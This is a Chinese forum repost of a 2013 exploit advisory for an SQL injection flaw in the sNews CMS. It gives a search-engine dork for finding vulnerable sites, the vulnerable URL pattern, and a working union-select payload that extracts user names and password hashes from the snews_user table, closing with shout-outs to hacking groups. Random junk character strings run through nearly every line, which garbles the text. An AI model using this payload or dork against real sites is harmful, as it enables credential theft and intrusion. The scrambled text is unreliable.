标题: CMS snews SQL Injection Vulnerability
+ ~9 Y1 \2 J+ p* S5 F作者: By onestree! f( [/ o7 X/ B/ ?9 c( M
下载地址 : http://snewscms.com/, e# j7 r" U8 R4 {9 s3 r
测试平台 : ubuntu 12.10 / win 7
0 _ H- b& ~" K$ x+ i3 e关键词: inurl:"tanyakan pada rumput yang bergoyang"
! G) D- u5 _( z. F: C% R- H9 J
9 a3 ~3 Q6 @4 I5 p) j
3 _2 i' A7 G, {*************************************************************
) a! x- m* j, p6 S5 \! I/ ? u8 l! u, D: w) H' G5 k8 L, h2 [
SQL poc:2 c/ g) O, Z+ D/ `& i9 b1 {
" l- J1 l" X9 x6 v8 j
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]! f2 @" d8 S/ ?& W
9 ?# v" [7 U V+ Z, B示例# J# q% `2 X- t
# V3 s: g3 S3 A. f* l5 Ihttp://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
9 A! H2 N: I: ~: a
- o9 k6 G, T! n ! ~5 S; X x/ q" f' A
致谢:3 M, f% e' J2 D& `0 L
3 q( d, E) Z/ Z
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
$ G e' r1 G1 @, i7 \$ O 9 J7 u8 |- P8 D) Z* \
indonesiancoder - moeslimh4x0r - go-coder
8 }! B1 `* J# g% T6 z& g
' ^( Q2 J! }4 g6 v# P4 l& kspesial my hunny :* D: _4 e! m/ m
|
发表于 2013-1-23 08:55:06
收藏
支持
反对